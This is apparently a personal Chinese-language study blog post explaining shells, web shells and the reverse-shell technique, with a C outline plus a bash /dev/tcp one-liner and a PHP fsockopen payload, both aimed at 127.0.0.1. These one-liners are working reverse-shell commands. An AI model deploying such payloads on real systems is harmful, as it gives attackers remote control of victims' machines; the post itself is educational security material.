2017.W47 - Reverse Shell
> 已知用火
## 前言 ##
最近終於願意開始學習 Reverse Shell[0]
順便學習一下各種 reverse shell 的寫法 (不過還是有很多不會寫 QQ)
終於進化到已知用火的階段了 QQ
## 內容 ##
Shell[1] 是介於作業系統跟使用者中間的一個介面程式 通常是命令式介面 (CLI)[2]
作業系統本身是不參與跟使用者的互動
Shell 本身可以做到很多系統底層的操作 以及呼叫外部程式、指令等
而 Web Shell 則是泛指透過 Web 介面 (BUI)[3] 一種操作方式
本身擁有的權限與網頁伺服器[4] 一致 在 Ubuntu 中就可能是 www-data 權限
正常來說 Remote Shell 的連線方式是透過使用者端 主動連線到伺服器
這種使用情境符合大多數的情況 但是在少數情況 (e.g. 駭客入侵) 的時候
會因為防火牆原則或在 NAT[5] 之後 所以無法主動連線到受害者機器
因此發展出 reverse shell 的概念 也就是受害者機器主動發出網路連線的一種技巧
概念上來說 被控制端需要 1)主動發出網路連線 與 2)產生一個互動式介面
用 C 語言當做例子 就是要分別 1) 建立一個 socket 連線與 2) 呼叫一個 /bin/sh 的程式
使用 socket(AF_INET, SOCK_STREAM, 0) 建立一個 TCP 連線是個簡單的方式
複雜的則可以實作 UDP / ICMP 等其他方式的網路連線
連線建立之後的 socket 就可以透過 dup2 將內容重導向到 stdin/stdout
接著執行 execv 來產生一個 bash shell
除了透過低階程式之外 也可以直接使用 bash / Linux 的特性直接產生一個 reverse shell
在 Linux 下直接對檔案 /dev/tcp/[IP]/[Port] [6] 做操作
這樣就可以直接對外產生一個網路連線 並傳送、接收指令
最後可以用以下指令快速產生一個 reverse shell
/bin/bash -i >& /dev/tcp/127.0.0.1/34182 0>&1
相同的概念也可以透過 PHP 來實作
藉由 fsockopen [7] 快速產生一個 socket (並且預期 FD 是 3)
在用 exec 來執行跟 bash reverse shell 類似的指令
<?php $sk = fsockopen("127.0.0.1", 34182); exec("/bin/bash -i <&3 >&3 2>&3"); ?>
[0]: https://stackoverflow.com/questions/35271850/what-is-reverse-shell
[1]: https://zh.wikipedia.org/wiki/%E6%AE%BC%E5%B1%A4
[2]: https://en.wikipedia.org/wiki/Command-line_interface
[3]: https://en.wikipedia.org/wiki/Browser_user_interface
[4]: https://en.wikipedia.org/wiki/Web_server
[5]: https://en.wikipedia.org/wiki/Network_address_translation
[6]: http://www.tldp.org/LDP/abs/html/devref1.html
[7]: http://php.net/manual/en/function.fsockopen.php